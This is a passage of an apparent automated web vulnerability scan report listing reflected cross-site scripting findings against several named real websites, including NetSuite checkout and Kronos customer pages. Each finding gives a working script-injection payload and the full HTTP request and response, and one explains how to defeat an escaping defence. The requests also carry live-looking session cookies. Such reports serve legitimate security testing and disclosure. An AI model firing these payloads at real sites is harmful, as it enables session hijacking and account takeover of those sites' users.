User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:31:28 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction97042<script>alert(1)</script>906f6279423("");

6.6. https://checkout.netsuite.com/core/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/core/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 21856'%20style%3dx%3aexpression(alert(1))%20b662ee241cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 21856\' style=x:expression(alert(1)) b662ee241cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /core/?21856'%20style%3dx%3aexpression(alert(1))%20b662ee241cf=1 HTTP/1.1
Referer: https://checkout.netsuite.com/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=B5nHN1Gc4ybGGqDmBpJGQWc4zLmmTVYkQCRtT62dbcTHJ21Gh0nyXcRkBNW8L2lLYXTlBCqgWNYv81PF1jh1nnCgkxLb691G2fmtYTf9gXpBvLwyvDgFJKknzh1Q5jQD!-620026609; NLVisitorId=rcHW8495AWICDiX0; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:05:45 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -110531729:616363742D6A6176613031382E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=VXMTN1NJZvQ6fx6SQq6bnR2Yztv7L6v79G1pNDsYlHnL2NW1VbWYQynfwrCTfhNmdJf0N1pvRxWRVBGXCQTGYT0LZTpCPytnGtVysYRypnS56r06v0mkRXCmkzXVSVrd!-620026609; path=/
Set-Cookie: NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 15:05:45 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2422

<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...
<a href='/s.nl?alias=core&21856\' style=x:expression(alert(1)) b662ee241cf=1&21856\'%20style%3dx%3aexpression(alert(1))%20b662ee241cf=1'>
...[SNIP]...

6.7. https://checkout.netsuite.com/core/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/core/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8226f\'%3balert(1)//b3b0eb2a796 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8226f\\';alert(1)//b3b0eb2a796 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /core/?8226f\'%3balert(1)//b3b0eb2a796=1 HTTP/1.1
Referer: https://checkout.netsuite.com/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=B5nHN1Gc4ybGGqDmBpJGQWc4zLmmTVYkQCRtT62dbcTHJ21Gh0nyXcRkBNW8L2lLYXTlBCqgWNYv81PF1jh1nnCgkxLb691G2fmtYTf9gXpBvLwyvDgFJKknzh1Q5jQD!-620026609; NLVisitorId=rcHW8495AWICDiX0; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:05:57 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -704362580:616363742D6A6176613031382E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=byykN1NVD9GV54JxSWRsMvBTxhWWpyzhrfD56p2fM5lLyD4ZGXvzTLJXNyy8xh2F9cPqgPJ6sWyNTvPshQdv6JWL4dS2RpvcpfkcVvY52cFxxGhFrYTp9bLnXcvfQsy5!-620026609; path=/
Set-Cookie: NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 15:05:57 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2338

<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...
<script language='Javascript' type='text/javascript'>document.location.href='/s.nl?alias=core&8226f\\';alert(1)//b3b0eb2a796=1&8226f\\'%3balert(1)//b3b0eb2a796=1&redirect_count=1&did_javascript_redirect=T'</script>
...[SNIP]...

6.8. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/s.nl/c.438708/n.1/sc.4/.f

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f2ecd'%20style%3dx%3aexpression(alert(1))%20f4981310c68 was submitted in the REST URL parameter 2. This input was echoed as f2ecd\' style=x:expression(alert(1)) f4981310c68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /s.nl/c.438708f2ecd'%20style%3dx%3aexpression(alert(1))%20f4981310c68/n.1/sc.4/.f?ext=T&login=T&reset=T&newcust=T&noopt=T HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; mbox=check#true#1303741628|session#1303736347554-914602#1303743428|PC#1303736347554-914602.17#1304951168

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:29:37 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 2000712853:616363742D6A6176613032372E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=968
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 2020

<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...
<a href='/s.nl?c=438708f2ecd\' style=x:expression(alert(1)) f4981310c68&n=1&sc=4&ext=T&login=T&reset=T&newcust=T&noopt=T&ext=T&login=T&reset=T&newcust=T&noopt=T'>
...[SNIP]...

6.9. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/s.nl/c.438708/n.1/sc.4/.f

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 33c23'%20style%3dx%3aexpression(alert(1))%204a27bdc6747 was submitted in the REST URL parameter 3. This input was echoed as 33c23\' style=x:expression(alert(1)) 4a27bdc6747 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /s.nl/c.438708/n.133c23'%20style%3dx%3aexpression(alert(1))%204a27bdc6747/sc.4/.f?ext=T&login=T&reset=T&newcust=T&noopt=T HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; mbox=check#true#1303741628|session#1303736347554-914602#1303743428|PC#1303736347554-914602.17#1304951168

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:31:29 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 333369207:616363742D6A6176613032372E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=982
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 2020

<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...
<a href='/s.nl?c=438708&n=133c23\' style=x:expression(alert(1)) 4a27bdc6747&sc=4&ext=T&login=T&reset=T&newcust=T&noopt=T&ext=T&login=T&reset=T&newcust=T&noopt=T'>
...[SNIP]...

6.10. https://customer.kronos.com/default.asp [rurl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://customer.kronos.com
Path:	/default.asp

Issue detail

The value of the rurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca2df"><script>alert(1)</script>9c27ecf4a9d was submitted in the rurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /default.asp?rurl=%2Fuser%2Fmanagefavorites%2Easp?favurl%3Dhttp%3A%2F%2Fcustomer%2Ekronos%2Ecom%2Fsitefeedbackform%2Ehtm%7Ct%3Dsiteca2df"><script>alert(1)</script>9c27ecf4a9d HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_nr=1303741346229; s_lv=1303741346233; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=NBPMPBCADGEDPGNKKLNHKCIO

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:25:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17417
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=rurl%3D%252Fuser%252Fmanagefavorites%252Easp%3Ffavurl%253Dhttp%253A%252F%252Fcustomer%252Ekronos%252Ecom%252Fsitefeedbackform%252Ehtm%257Ct%253Dsiteca2df%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9c27ecf4a9d; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
<INPUT type="hidden" name="rurl" value="/user/managefavorites.asp?favurl=http://customer.kronos.com/sitefeedbackform.htm|t=siteca2df"><script>alert(1)</script>9c27ecf4a9d">
...[SNIP]...

6.11. http://demr.opt.fimserve.com/adopt/ [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://demr.opt.fimserve.com
Path:	/adopt/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19ac4'%3balert(1)//6e1f792b3af was submitted in the sz parameter. This input was echoed as 19ac4';alert(1)//6e1f792b3af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adopt/?r=h&l=999e4367-df70-42c4-a090-65a968de6505&sz=300x25019ac4'%3balert(1)//6e1f792b3af&neg=&ega=&puid=&rnd=2466948 HTTP/1.1
Host: demr.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://www.ripoffreport.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; DMEXP=4; UI="2a8dbca1b98673a117|79973..9.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; ssrtb=0; SUBHS=|||00FY6l1fm00000pjK4H|1.1303561987332; LO=00GO66Bfm00000f500n1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:09:28 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: keep-alive
P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 179
Server: ASP/0.0.0.0/0.7.61

<script language='Javascript'>
_sdc_loaded=true;
_sdc_error=true;
_sdc_loc_ext_id='999e4367-df70-42c4-a090-65a968de6505';
_sdc_sz='300x25019ac4';alert(1)//6e1f792b3af';
</script>

6.12. http://desk.opt.fimserve.com/adopt/ [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://desk.opt.fimserve.com
Path:	/adopt/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40f29'%3balert(1)//c9cb65877c9 was submitted in the sz parameter. This input was echoed as 40f29';alert(1)//c9cb65877c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adopt/?r=h&l=999e4367-df70-42c4-a090-65a968de6505&sz=160x60040f29'%3balert(1)//c9cb65877c9&neg=&ega=&puid=&rnd=6148479 HTTP/1.1
Host: desk.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://www.ripoffreport.com/ConsumerResources.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; DMEXP=4; UI="2a8dbca1b98673a117|79973..9.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; ssrtb=0; LO=00GM67mfm00008f500v7

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 16:14:40 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: keep-alive
P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 179

<script language='Javascript'>
_sdc_loaded=true;
_sdc_error=true;
_sdc_loc_ext_id='999e4367-df70-42c4-a090-65a968de6505';
_sdc_sz='160x60040f29';alert(1)//c9cb65877c9';
</script>

6.13. http://ds.addthis.com/red/psi/sites/www.kronos.com/p.json [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.kronos.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload caea3<script>alert(1)</script>a8615876143 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.kronos.com/p.json?callback=_ate.ad.hprcaea3<script>alert(1)</script>a8615876143&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.kronos.com%2Fabout%2Fabout-kronos.aspx&zzr8oz HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%7D..1303662902.1FE|1303662902.1OD|1303662902.60; dt=X; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 25 Apr 2011 13:51:39 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 25 May 2011 13:51:39 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 25 Apr 2011 13:51:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 25 Apr 2011 13:51:39 GMT
Connection: close

_ate.ad.hprcaea3<script>alert(1)</script>a8615876143({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

6.14. http://event.adxpose.com/event.flow [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://event.adxpose.com
Path:	/event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 35b4c<script>alert(1)</script>b4350c97119 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-1134822682510879%26output%3Dhtml%26h%3D600%26slotname%3D3061072279%26w%3D160%26lmt%3D1303759227%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fgames.webalta.ru%252F%26dt%3D1303741227549%26bpp%3D5%26shv%3Dr20110420%26jsv%3Dr20110415%26correlator%3D1303741227571%26frm%3D0%26adk%3D1110337129%26ga_vid%3D973557293.1303741228%26ga_sid%3D1303741228%26ga_hid%3D154889240%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D1%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1125%26bih%3D929%26fu%3D0%26ifi%3D1%26dtd%3D35%26xpc%3DnaYdoqC7iz%26p%3Dhttp%253A%2F%2Fgames.webalta.ru&uid=ZC45X9Axu6NOUFfX_28966835b4c<script>alert(1)</script>b4350c97119&xy=0%2C0&wh=160%2C600&vchannel=69113&cid=166308&iad=1303741233200-54504055902361870&cookieenabled=1&screenwh=1920%2C1200&adwh=160%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=79DACCAB16BC495962702839F5429393; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 145
Date: Mon, 25 Apr 2011 14:23:59 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_28966835b4c<script>alert(1)</script>b4350c97119");

6.15. https://hourly.deploy.com/hmc/report/ ['"--> parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The value of the '"--></style></script><script>netsparker(0x000054)</script> request parameter is copied into the HTML document as plain text between tags. The payload e3cac<script>alert(1)</script>5fcd26dde92 was submitted in the '"--></style></script><script>netsparker(0x000054)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/?'"--></style></script><script>netsparker(0x000054)</script>e3cac<script>alert(1)</script>5fcd26dde92 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:10 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:10 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:10 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
</script>e3cac<script>alert(1)</script>5fcd26dde92" method="post">
...[SNIP]...

6.16. https://hourly.deploy.com/hmc/report/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 955ef"><script>alert(1)</script>eaec9f444c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/?955ef"><script>alert(1)</script>eaec9f444c3=1 HTTP/1.1
Host: hourly.deploy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
